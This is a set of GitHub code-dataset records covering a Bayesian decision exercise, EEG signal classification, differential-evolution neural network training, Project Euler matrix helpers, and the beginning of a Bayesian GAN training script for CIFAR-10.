Entscheidungsgrenze')\nplt.ylabel(r'$p(H_1|+)$')\nplt.xlabel(r'$x^*$')\nplt.legend()\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/a.eps', format='eps')\nplt.show()\n\n\n# Aufgabe b)\npx_H0 = dichte(x_values, mu_H0, std_H0)\npx_H1 = dichte(x_values, mu_H1, std_H1)\npx_9 = rand(x_values, px_H0, p_H0[0], px_H1, p_H1[0])\npx_99 = rand(x_values, px_H0, p_H0[1], px_H1, p_H1[1])\np_H0_x_9 = posterior(x_values,p_H0[0], px_H0, px_9)\np_H1_x_9 = posterior(x_values,p_H1[0], px_H1, px_9)\np_H0_x_99 = posterior(x_values,p_H0[1], px_H0, px_99)\np_H1_x_99 = posterior(x_values,p_H1[1], px_H1, px_99)\n\n# Schnittmenge finden\nround1 = [round(zahl, 5) for zahl in p_H0_x_9]\nround2 = [round(zahl, 5) for zahl in p_H1_x_9]\ngemeinsame_elemente = set(round1).intersection(round2)\ngemeinsame_elemente = [x for x in round1 if x in round2]\nprint(list(gemeinsame_elemente))\nP1_err_H0 = 1-stats.norm.cdf(6.7, loc=mu_H0, scale=std_H0)*p_H0[0]\nP2_err_H0 = stats.norm.cdf(6.7, loc=mu_H1, scale=std_H1)*p_H1[0]\nR1 = 1-stats.norm.cdf(9.1, loc=mu_H0, scale=std_H0)*p_H0[1]\nR2 = stats.norm.cdf(9.1, loc=mu_H1, scale=std_H1)*p_H1[1]\n\nBFR_9 = P1_err_H0 + P2_err_H0\nBFR_99 = R1 + R2\n\nprint(BFR_9)\nprint(BFR_99)\n\nplt.figure(figsize=(18, 12))\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9, $H_1$ = 0.1', color='orange')\nplt.plot(x_values, p_H1_x_9, color='orange')\nplt.plot(x_values, p_H0_x_99, color='brown')\nplt.plot(x_values, p_H1_x_99, label=r'$H_0$ = 0.99, $H_1$ = 0.01', color='brown')\nplt.plot([6.7, 6.7], [0, 1], color='k')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title('Posteriors')\nplt.grid(True)\nplt.ylabel(r'$p(H_i|x)$')\nplt.xlabel(r'$x$')\nplt.legend()\nidx1 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_9) - np.array(p_H1_x_9)))).flatten()\nidx2 = np.argwhere(np.diff(np.sign(np.array(p_H0_x_99) - np.array(p_H1_x_99)))).flatten()\nprint(idx1)\nprint(idx2)\nprint(x_values[514])\nprint(x_values[698])\nplt.savefig('plots/Aufgabe3/b_3.eps', 
format='eps')\nplt.show()\n\n\n\n# Aufgabe c)\nplt.figure(figsize=(18, 12))\nplt.plot(False_P, True_P, color='green')\n#plt.title(r'ROC-Kurve')\nplt.xlabel(r'$\\alpha$')\nplt.ylabel(r'$1 - \\beta$')\nplt.grid(True)\nplt.savefig('plots/Aufgabe3/c.eps', format='eps')\nplt.show()\n\n\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund', color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_9, label=r'$H_0$ = 0.9', color='red')\nplt.plot(x_values, p_H1_x_9,label=r'$H_1$ = 0.1', color='blue')\nplt.plot([6.7, 6.7], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_1.eps', format='eps')\nplt.show()\n\n#Test\nplt.figure(figsize=(18, 12))\np_x_H0 = dichte(x_values, mu_H0, std_H0)\np_x_H1 = dichte(x_values, mu_H1, std_H1)\nplt.plot(x_values, p_x_H0, label=r'$H_0$ - gesund',color='red', linestyle='--')\nplt.plot(x_values, p_x_H1, label=r'$H_1$ - infiziert', color='blue', linestyle='--')\nplt.plot(x_values, p_H0_x_99, label=r'$H_0$ = 0.99', color='red')\nplt.plot(x_values, p_H1_x_99,label=r'$H_1$ = 0.01', color='blue')\nplt.plot([9.1, 9.1], [0, 1], label='Entscheidungsgrenzen', color='k')\nplt.title(r'Wahrscheinlichkeitsfuntion $H_0$ und $H_1$')\nplt.grid(True)\nplt.ylabel(r'$p(x|H_i)$')\nplt.xlabel(r'$x$')\nplt.legend()\nplt.savefig('plots/Aufgabe3/b_2.eps', format='eps')\nplt.show()","repo_name":"livi099/Statistische_Mustererkennung_UE","sub_path":"Uebung2/Aufgabe 3 old.py","file_name":"Aufgabe 3 old.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
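In the notation of the script above, `dichte` is the class-conditional density, `rand` the marginal, and `posterior` Bayes' rule. Written out (LaTeX, matching the two-hypothesis setup with equal standard deviations):

```latex
p(x \mid H_i) = \frac{1}{\sqrt{2\pi}\,\sigma} \exp\!\left(-\frac{(x-\mu_i)^2}{2\sigma^2}\right), \qquad
p(x) = p(x \mid H_0)\,p(H_0) + p(x \mid H_1)\,p(H_1), \qquad
p(H_i \mid x) = \frac{p(x \mid H_i)\,p(H_i)}{p(x)}
```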
+{"seq_id":"7774565972","text":"\"\"\"\r\nCreated on Wed Feb 14 22:22:09 2018\r\n\r\n@author: Anet\r\nprint(__doc__)\r\n\"\"\"\r\nimport mne\r\nimport numpy as np\r\nfrom mne import io\r\nimport platform; print(platform.platform())\r\nimport sys; print(\"Python\", sys.version)\r\nimport numpy; print(\"NumPy\", numpy.__version__)\r\nimport scipy; print(\"SciPy\", scipy.__version__)\r\nimport sklearn; print(\"Scikit-Learn\", sklearn.__version__)\r\nimport feature as ft\r\nimport lda as lda\r\nimport epochs_methods as epoch_met\r\nimport input_test_data as load_file_names\r\nfrom builtins import print\r\nimport mix_data_x_y as mix\r\nimport config\r\nimport neural_network as neural_network\r\nimport print_results\r\nfrom numpy.random import seed\r\nfrom keras.models import load_model\r\n\r\n\r\nseed(1)\r\n\r\n\r\n#turn off log\r\nmne.set_log_level('ERROR')\r\n# import os\r\n# os.environ[\"TF_CPP_MIN_LOG_LEVEL\"]=\"4\"\r\n\r\n# Set path to raw data folder \r\nDATA_FOLDER ='C:/Users/Anet/eclipse-workspace/Classification/raw_data/'\r\n\r\n\r\n# Set EEG event list - instruction\r\n\r\n\r\n\r\n##############################################\r\n#\r\n# Data loading\r\n#\r\n##############################################\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy trenovacich souboru a jejich targetove/non-targetove znacky\r\nfiles_training_map = load_file_names.load_training_data_names()\r\n\r\n# mapu, ve ktere jsou ulozeny nazvy testovacich souboru a jejich targetove nazvy\r\nfiles_testing_map = load_file_names.load_predicting_data_names()\r\n\r\n\r\n\r\ndata_training_count = len(files_training_map)\r\ndata_predicting_count = len(files_testing_map)\r\n\r\n##############################################\r\n#\r\n# Loading data to train\r\n#\r\n##############################################\r\nraw = []\r\nfor i in range(data_training_count):\r\n path = DATA_FOLDER + (files_training_map[i][0])\r\n raw.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n# print(raw[i]._events)\r\n\r\n##############################################\r\n#\r\n# Loading data to predict\r\n#\r\n##############################################\r\nraw_to_predict = []\r\ntrue_prediction = []\r\nfor i in range(data_predicting_count):\r\n path = DATA_FOLDER + (files_testing_map[i][0])\r\n true_prediction.append(files_testing_map[i][1])\r\n true_prediction[i] = true_prediction[i].strip()\r\n raw_to_predict.append(io.read_raw_brainvision(vhdr_fname=path, preload=True))\r\n raw_to_predict[i].filter(config.low_filter_frequency,config.high_filter_frequency)\r\n\r\n \r\n##############################################\r\n#\r\n# Epochs creating\r\n#\r\n##############################################\r\n \r\n# Vytvori epochy pro klasifikaci\r\nevent_to_predict = []\r\nepochs_to_predict = []\r\nfor i in range(data_predicting_count):\r\n event_to_predict.append(raw_to_predict[i]._events)\r\n \r\n if(i < config.instruction_files_to_pred):\r\n\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n else:\r\n epochs_to_predict.append(mne.Epochs(raw_to_predict[i],event_to_predict[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n \r\n \r\n\r\n# Plot raw data\r\n# raw[0].plot(block=True, 
lowpass=40, n_channels=5)\r\n\r\n# for i in range(data_count): \r\n# raw[i].plot(block=True, lowpass=40, n_channels=6)\r\n\r\n##############################################\r\n#\r\n# \r\n#\r\n##############################################\r\n\r\n\r\n\r\n\r\n# Set color of events\r\n\"\"\"\r\n\r\n\r\nfor i in range(data_count):\r\n mne.viz.plot_events(events[i],raw[i].info['sfreq'], raw[i].first_samp, color=config.color)\r\n \"\"\"\r\n\r\n#extract epochs\r\n\r\nevents_train = []\r\nepochs = []\r\nepochs_targets = []\r\nepochs_non_targets = []\r\n\r\n\r\n\r\n# Vytvori epochy, z vytvorenych Epoch potom vybere ty targetove a ulozi je do epochs_target\r\n\r\nfor i in range(data_training_count):\r\n events_train.append(raw[i]._events)\r\n \r\n if(i < config.instruction_files_count):\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_instruction, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 1\r\n else:\r\n epochs.append(mne.Epochs(raw[i],events_train[i], event_id=config.event_id_matrix, tmin=config.epoch_tmin, tmax=config.epoch_tmax,baseline=(config.baseline_min, config.baseline_max), preload=True))\r\n instruction = 0\r\n \r\n epochs_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][1], instruction)) \r\n epochs_non_targets.append(epoch_met.filter_epochs_target(epochs[i], events_train[i], files_training_map[i][2], instruction)) \r\n \r\n\r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_epochs(epochs[i])\r\n\"\"\"\r\n\r\n# epochs.plot(title=\"Events epochs\", n_epochs=(len(epochs.events)),event_colors=color)\r\n# mne.viz.plot_epochs(epochs, title=\"Events epochs\", n_epochs=15,event_colors=color)\r\n\r\n\r\n\r\n# Create evoked structure\r\n\r\nevoked_dict = [[]]\r\n# jen pro instruction\r\nfor i in range(config.instruction_files_count):\r\n evoked_dict.append('')\r\n evoked_dict[i] = dict()\r\n for condition in config.conditions:\r\n evoked_dict[i][condition] = epochs[i][condition].average()\r\n \r\n\r\n# Plot chart \r\n\r\n\"\"\"\r\nfor i in range(data_count):\r\n mne.viz.plot_compare_evokeds(evoked_dict[i], title=\"ERP chart\", colors=config.colors, linestyles=config.linestyles, gfp=False)\r\n\"\"\"\r\n\r\n\"\"\"\r\n\r\nExtrakce priznaku\r\n\r\n\"\"\"\r\nlabels = epochs[0].events[:, -1]\r\n\r\n#feature extraction\r\n \r\ntarget_features = []\r\nnon_target_features = []\r\nx = []\r\n\r\n\r\ntest_sample_count = 5\r\n\r\n\r\ny = []\r\n\r\n\r\n# Prepare data to training \r\ntarget_nontarget_epochs = epochs_targets + epochs_non_targets\r\n\r\n\r\nfor i in range(len(target_nontarget_epochs)):\r\n #count of target epochs \r\n for j in range(len(target_nontarget_epochs[i])):\r\n \r\n pick_epochs = target_nontarget_epochs[i][j].pick_channels(config.chan)\r\n x.append(ft.feature_vector(pick_epochs))\r\n if(i < epochs_targets.__len__()):\r\n y.append(1)\r\n else:\r\n y.append(0)\r\n\r\n\r\n# Prepare data to predict \r\nx_pred = []\r\n\r\ny = np.array(y)\r\n\r\nfor i in range(data_predicting_count):\r\n x_pred.append([])\r\n for j in range(len(epochs_to_predict[i])):\r\n pick_epoch_to_predict = epochs_to_predict[i][j].pick_channels(config.chan)\r\n x_pred[i].append(ft.feature_vector(pick_epoch_to_predict))\r\n\r\n\r\n\r\n\r\nmix.mix_data(x, y)\r\n\r\n# X = np.reshape(X,(-1, 100))\r\n\r\n##############################################\r\n#\r\n# Predicting\r\n#\r\n##############################################\r\n\r\n# plotting means of 
training data\r\n# plt.plot(np.mean(X[y==1], axis=0))\r\n# plt.plot(np.mean(X[y==0], axis=0))\r\n# plt.show()\r\n\r\n\r\n# plotting tests epochs\r\n# for i in range(len(X_pred)):\r\n# name = str(i)+'.png'\r\n# plt.plot(X_pred[i])\r\n# plt.savefig(name)\r\n\r\n\r\n\r\nx_event_lda = []\r\nx_event_neural = []\r\n\r\nprint()\r\nprint(\"If you want to load model from file: 1\")\r\nprint(\"If you want to train new model : 0\")\r\nprint()\r\nmodel_load = input(\"Load model? 1/0: \")\r\nif(model_load == '1'):\r\n config.model = load_model('save_models/mymodel_5.h5') \r\nelse:\r\n if(model_load == '0'):\r\n neural_network.train(x, y)\r\n else:\r\n print(\"Invalid option\")\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n x_event_lda.append(lda.solve(x,y,x_pred[i]))\r\n x_event_neural.append(neural_network.solve(x_pred[i]))\r\n\r\n\r\nfor i in range(data_predicting_count):\r\n print()\r\n print(\"##########################################\")\r\n print()\r\n \r\n \r\n if(i < config.instruction_files_to_pred):\r\n \r\n print(i+1,\".) Expected solve: \",true_prediction[i])\r\n print()\r\n \r\n instruction = 1\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n else:\r\n if(i%2==1):\r\n print(i+1,\".) Expected solve: \",true_prediction[i],true_prediction[i+1])\r\n \r\n print()\r\n \r\n instruction = 0\r\n print(\"LDA: \")\r\n print_results.print_guess(x_event_lda[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n print(\"Neural network: \")\r\n print_results.print_guess(x_event_neural[i], epochs_to_predict[i], true_prediction[i],instruction)\r\n \r\n print()\r\n\r\n\r\n\r\n\r\n","repo_name":"medunova/Classificator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2961502300","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom operator import itemgetter\nfrom datetime import datetime\nimport copy\nimport torch\n\n\nclass DE:\n\n def __init__(self, objective_function, population_function, X, y, Xtest=None, ytest=None, pop_size=50,\n F=0.5, cr=0.5, start_agent=None, use_cuda=False):\n if use_cuda and torch.cuda.is_available:\n self.device = torch.device('cuda')\n print('Using GPU')\n else:\n self.device = torch.device('cpu')\n self.obj = objective_function\n self.X = X.to(self.device)\n self.y = y.long().to(self.device)\n self.N = pop_size\n self.pop_func = population_function\n self.F = torch.Tensor([F]).to(self.device)\n self.cr = torch.Tensor([cr]).to(self.device)\n self.pop = [population_function().to(self.device) for i in range(pop_size)]\n self.testNN = population_function().to(self.device)\n self.testcost = False\n if start_agent is not None:\n self.pop[0] = copy.deepcopy(start_agent)\n if Xtest is not None and ytest is not None:\n self.Xtest = Xtest.to(self.device)\n self.ytest = ytest.long().to(self.device)\n self.testcost = True\n\n def save_model(self, fname, path='../Conv1DModels/', agent=None):\n if agent is None:\n agent = self.best_agent\n torch.save(agent, path+fname)\n\n def load_model(self, fname, path='../Conv1DModels/'):\n return torch.load(path+fname)\n\n def NN_obj(self, agent):\n yhat = agent(self.X)[0].T\n return self.obj(yhat, self.y)\n\n def mutation(self, nets):\n\n for testp, p1, p2, p3 in zip(*[net.parameters() for net in nets]):\n testp.data = p1 + self.F * (p2 - p3)\n\n pass\n\n def crossover(self, target):\n\n for dw, tw in zip(self.testNN.parameters(), target.parameters()):\n crit = torch.rand(dw.shape, device=self.device) < self.cr\n trial_w = crit * dw + ~crit * tw\n dw.data = trial_w\n\n pass\n\n def evolution(self, num_epochs, verbose=False, print_epoch=1000):\n # evaluate the initialized population with the objective function\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n\n # find the best agent within the initial population\n self.best_agent = self.pop[torch.argmin(obj_all)]\n\n best_obj = torch.min(obj_all)\n prev_obj = best_obj\n\n self.best_objs = np.zeros(num_epochs + 1)\n self.best_objs[0] = best_obj\n\n if self.testcost:\n self.best_test_objs = np.zeros(num_epochs + 1)\n self.best_test_objs[0] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n for i in range(num_epochs):\n for j, x in enumerate(self.pop):\n\n choice = np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)\n a, b, c = itemgetter(*choice)(self.pop)\n # a, b, c = self.pop[np.random.choice(np.delete(np.arange(self.N), j), 3, replace=False)]\n\n # Mutation\n self.mutation([self.testNN, a, b, c])\n\n # Crossover\n self.crossover(x)\n\n # Selection\n obj_u = self.NN_obj(self.testNN)\n if obj_u < self.NN_obj(x):\n self.pop[j] = copy.deepcopy(self.testNN)\n obj_all[j] = obj_u\n\n # update the current best objective function value\n best_obj = torch.min(obj_all)\n self.best_objs[i + 1] = best_obj\n\n if best_obj < prev_obj:\n # update best agent\n self.best_agent = self.pop[torch.argmin(obj_all)]\n # update previous solution to use for next iteration\n prev_obj = best_obj\n\n if self.testcost:\n self.best_test_objs[i + 1] = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n\n if verbose and i % print_epoch == 0:\n # report progress at each iteration\n print('%d: cost= %.5f' % (i, best_obj))\n print('%d: testcost= %.5f' % (i, self.best_test_objs[i + 1]))\n print('%d: acc= 
%.5f' % (i, self.accuracy(self.best_agent(self.X), self.y)))\n print('%d: testacc= %.5f' % (i, self.accuracy(self.best_agent(self.Xtest), self.ytest)))\n plt.plot(list(self.best_agent.parameters())[0].cpu().detach()[0][0])\n plt.show()\n\n return self.best_agent\n\n def evaluate(self, plot_function=None, agent=None, bounds=None, title=' '):\n\n if agent is None:\n agent = self.best_agent\n plt.figure(figsize=(13, 8))\n plt.plot(range(len(self.best_objs)), self.best_objs)\n plt.plot(range(len(self.best_test_objs)), self.best_test_objs)\n plt.title('Training Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n plt.ylabel('Cost', fontsize=20)\n plt.legend(['Train', 'Test'], fontsize=14)\n plt.show()\n\n if plot_function is not None:\n plot_function(agent, self.Xtest, self.ytest, title=title, savefig=False)\n\n print(f\"Best agent is {agent} with a train cost of {np.round(self.NN_obj(agent).cpu().detach(), 5)}.\")\n print(f\"And a test cost of {np.round(self.obj(agent(self.Xtest)[0].T, self.ytest).cpu().detach(), 5)}\")\n\n # print(f\"Worst initialization was {self.initial_worst_agent} with a cost of \\\n # {np.round(self.obj(self.initial_worst_agent), 2)}.\")\n\n pass\n\n def accuracy(self, predictions, ytest):\n predictions = predictions.argmax(axis=1)\n correct_preds = ytest == predictions\n return torch.sum(correct_preds) / len(ytest)\n\n def early_stop_training(self, patience, measure='cost', eval=True, v=True):\n\n n = 1\n iterations = 0\n if measure == 'cost':\n no_iterations_rising = 0\n val_error = 20000\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n opt_iterations = iterations\n testcosts = []\n\n while (no_iterations_rising < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_error_new = self.obj(self.best_agent(self.Xtest)[0].T, self.ytest)\n testcosts.append(val_error_new.item())\n if (val_error_new < val_error):\n if v: print(f\"{iterations}: Test Cost Falling {val_error_new}\")\n no_iterations_rising = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_error = val_error_new\n else:\n no_iterations_rising += n\n\n testcosts = np.array(testcosts)\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best error:\", val_error)\n print(\"Error at stop:\", val_error_new)\n\n elif measure == 'accuracy':\n no_iterations_falling = 0\n val_acc = 0\n opt_iterations = iterations\n testcosts = []\n obj_all = torch.Tensor([self.NN_obj(agent) for agent in self.pop])\n self.opt_agent = copy.deepcopy(self.pop[torch.argmin(obj_all)])\n\n while (no_iterations_falling < patience):\n self.evolution(num_epochs=n, verbose=False, print_epoch=1)\n iterations = iterations + n\n val_acc_new = self.accuracy(self.best_agent(self.Xtest), self.ytest)\n testcosts.append(val_acc_new.item())\n if (val_acc_new > val_acc):\n if v: print(f\"{iterations}: Test Accuracy Rising {val_acc_new}\")\n no_iterations_falling = 0\n self.opt_agent = copy.deepcopy(self.best_agent)\n opt_iterations = iterations\n val_acc = val_acc_new\n else:\n no_iterations_falling += n\n # print(\"Falling or the same\")\n\n if v:\n print(\"Optimal number of iterations:\", opt_iterations)\n print(\"Best accuracy:\", val_acc)\n print(\"Accuracy at stop:\", val_acc_new)\n\n if eval:\n plt.figure(figsize=(13, 8))\n plt.plot(testcosts)\n plt.title('Test Cost Graph', fontsize=24)\n plt.xlabel('Iterations', fontsize=20)\n 
plt.ylabel('Test Cost', fontsize=20)\n plt.show()\n\n return self.best_agent, self.opt_agent\n\n\n\n\n\n\n","repo_name":"FaxMan1/Master-Thesis","sub_path":"DE_Pytorch.py","file_name":"DE_Pytorch.py","file_ext":"py","file_size_in_byte":8792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
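The `DE` class above leaves the model and objective wiring implicit. A minimal sketch of driving it follows; `TinyNet` is hypothetical, not the repo's Conv1D model. Since `NN_obj` evaluates `agent(X)[0].T` against `y` and `accuracy` argmaxes over axis 1, the population factory must build models whose output is shaped `(1, num_classes, num_samples)`.

```python
import torch
import torch.nn as nn

# Hypothetical population factory for the DE class above (a sketch, not the
# author's setup): output shape (1, C, N) so that agent(X)[0].T is (N, C).
class TinyNet(nn.Module):
    def __init__(self, n_in=8, n_classes=3):
        super().__init__()
        self.fc = nn.Linear(n_in, n_classes)

    def forward(self, x):
        return self.fc(x).T.unsqueeze(0)  # (1, num_classes, num_samples)

X, y = torch.randn(100, 8), torch.randint(0, 3, (100,))
de = DE(objective_function=nn.CrossEntropyLoss(),
        population_function=TinyNet,
        X=X, y=y, Xtest=X, ytest=y, pop_size=10, F=0.5, cr=0.7)
best = de.evolution(num_epochs=20)
print(de.best_objs[-1])  # best training cost after the final epoch
```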
+{"seq_id":"31947234242","text":"import sys\n\nresult = {}\nif __name__ == '__main__':\n for ln in sys.stdin:\n try:\n split = ln.split()\n od = split[0]\n for idx, val in enumerate(split[3].split(\";\")):\n if val.split(\":\")[2] == \"1\":\n key = od + \"_\" + val.split(\"|\")[0]\n if not result.has_key(key):\n result[key] = set([])\n result[key].add(split[1])\n except Exception as e:\n print(\"error:\", e)\n\n for key, val in result.iteritems():\n f = open(\"xunfei\" + key, \"a\")\n for m in val:\n f.write(m + \"\\n\")\n f.close()\n","repo_name":"chenfangzhi123/pyDemo","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25913055736","text":"# common matrix functions for 081, 082 and 083\nfrom dijkstra import Node\n\ndef load_matrix_from_file(filename):\n matrix = []\n f = open(filename, \"r\")\n for line in f:\n matrix.append([int(x) for x in line.strip().split(\",\")]) \n f.close()\n return matrix\n\ndef node_at(nd,x,y,value):\n key = \"{},{}\".format(x,y)\n if key in nd:\n return nd[key]\n node = Node(value)\n nd[key] = node\n return node\n\ndef convert_matrix_to_graph(m,\n include_right=False,include_left=False,include_down=False,include_up=False):\n nd = {} # node dictionary, key = \"1,5\" index in matrix\n all_nodes = []\n for x,row in enumerate(m):\n for y,value in enumerate(row):\n curr = node_at(nd, x, y, value)\n all_nodes.append(curr)\n if include_right and y < len(row)-1:\n right = node_at(nd, x, y+1, m[x][y+1])\n curr.add_neighbor(right)\n if include_left and y > 0:\n left = node_at(nd, x, y-1, m[x][y-1])\n curr.add_neighbor(left)\n if include_down and x < len(m)-1:\n down = node_at(nd, x+1, y, m[x+1][y])\n curr.add_neighbor(down)\n if include_up and x > 0:\n up = node_at(nd, x-1, y, m[x-1][y])\n curr.add_neighbor(up)\n return all_nodes\n","repo_name":"MrDeshaies/NOT-projecteuler.net","sub_path":"euler_081_083_matrix.py","file_name":"euler_081_083_matrix.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38063729425","text":"# # Training\n# \n# We show that Bayesian GAN can capture the data distribution by measuring its performance in the semi-supervised setting. We will perform the posterior update as outline in Algorithm 1 in Saatchi (2017). This algorithm can be implemented quite simply by adding noise to standard optimizers such as SGD with momentum and keep track of the parameters we sample from the posterior. \n\n# \n\n# ### SGHMC by Optimizing a Noisy Loss\n# \n# First, observe that the update rules are similar to momentum SGD except for the noise $\\boldsymbol{n}$. In fact, without $\\boldsymbol{n}$, this is equivalent to performing momentum SGD with the loss is $- \\sum_{i=1}{J_g} \\sum_{k=1}^{J_d} \\log \\text{posterior} $. We will describe the case where $J_g = J_d=1$ for simplicity. \n# \n# We use the main loss $\\mathcal{L} = - \\log p(\\theta | ..)$ and add a noise loss $\\mathcal{L}_\\text{noise} = \\frac{1}{\\eta} \\theta \\cdot \\boldsymbol{n}$ where $\\boldsymbol{n} \\sim \\mathcal{N}(0, 2 \\alpha \\eta I)$ so that optimizing the loss function $\\mathcal{L} + \\mathcal{L}_\\text{noise}$ with momentum SGD is equivalent to performing the SGHMC update step. \n# \n# Below (Equation 3 and 4) are the posterior probabilities where each error term corresponds its negative log probability.\n\n# \n\n#from __future__ import print_function\nimport os, pickle\nimport numpy as np\nimport random, math\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom statsutil import AverageMeter, accuracy\nfrom tensorboard_logger import configure, log_value\n\n# Default Parameters\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='cifar10')\nparser.add_argument('--imageSize', type=int, default=32)\nparser.add_argument('--batchSize', type=int, default=64, help='input batch size')\nparser.add_argument('--nz', type=int, default=100, help='size of the latent z vector')\nparser.add_argument('--niter', type=int, default=2, help='number of epochs to train for')\nparser.add_argument('--lr', type=float, default=0.0002, help='learning rate, default=0.0002')\nparser.add_argument('--cuda', type=int, default=1, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--outf', default='modelfiles/pytorch_demo3', help='folder to output images and model checkpoints')\nparser.add_argument('--numz', type=int, default=1, help='The number of set of z to marginalize over.')\nparser.add_argument('--num_mcmc', type=int, default=10, help='The number of MCMC chains to run in parallel')\nparser.add_argument('--num_semi', type=int, default=4000, help='The number of semi-supervised samples')\nparser.add_argument('--gnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--dnoise_alpha', type=float, default=0.0001, help='')\nparser.add_argument('--d_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--g_optim', type=str, default='adam', choices=['adam', 'sgd'], help='')\nparser.add_argument('--stats_interval', type=int, default=10, help='Calculate test accuracy every interval')\nparser.add_argument('--tensorboard', type=int, default=1, help='')\nparser.add_argument('--bayes', type=int, 
default=1, help='Do Bayesian GAN or normal GAN')\nimport sys; sys.argv=['']; del sys\nopt = parser.parse_args()\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n print(\"Error Making Directory\", opt.outf)\n pass\nif opt.tensorboard: configure(opt.outf)\n\n# First, we construct the data loader for full training set \n# as well as the data loader of a partial training set for semi-supervised learning\n# transformation operator\nnormalize = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\ntransform_opt = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n# get training set and test set\ndataset = dset.CIFAR10(root=\"./cifar10\", download=True,\n transform=transform_opt) \ndataloader = torch.utils.data.DataLoader(dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\nfrom partial_dataset import PartialDataset\n# partial dataset for semi-supervised training\ndataset_partial = PartialDataset(dataset, opt.num_semi)\n\n\n# test set for evaluation\ndataset_test = dset.CIFAR10(root=\"./cifar10\",\n train=False,\n transform=transform_opt)\ndataloader_test = torch.utils.data.DataLoader(dataset_test,\n batch_size=opt.batchSize, shuffle=False, pin_memory=True, num_workers=0)\n\ndataloader_semi = torch.utils.data.DataLoader(dataset_partial, batch_size=opt.batchSize,\n shuffle=True, num_workers=0)\n\n\n# Now we initialize the distributions of G and D\n##### Generator ######\n# opt.num_mcmc is the number of MCMC chains that we run in parallel\n# opt.numz is the number of noise batches that we use. We also use different parameter samples for different batches\n# we construct opt.numz * opt.num_mcmc initial generator parameters\n# We will keep sampling parameters from the posterior starting from this set\n# Keeping track of many MCMC chains can be done quite elegantly in Pytorch\nfrom utils.BayesianCGANModels.discriminators import _BayesianLeNetD, _netD\nfrom utils.BayesianCGANModels.generators import _BayesianNetG #_netG\nfrom statsutil import weights_init\nnetGs = []\nfor _idxz in range(opt.numz):\n for _idxm in range(opt.num_mcmc):\n netG = _BayesianNetG(noize=opt.nz)\n #netG.apply(weights_init)\n netGs.append(netG)\n \n##### Discriminator ######\n# We will use 1 chain of MCMCs for the discriminator\n# The number of classes for semi-supervised case is 11; that is,\n# index 0 for fake data and 1-10 for the 10 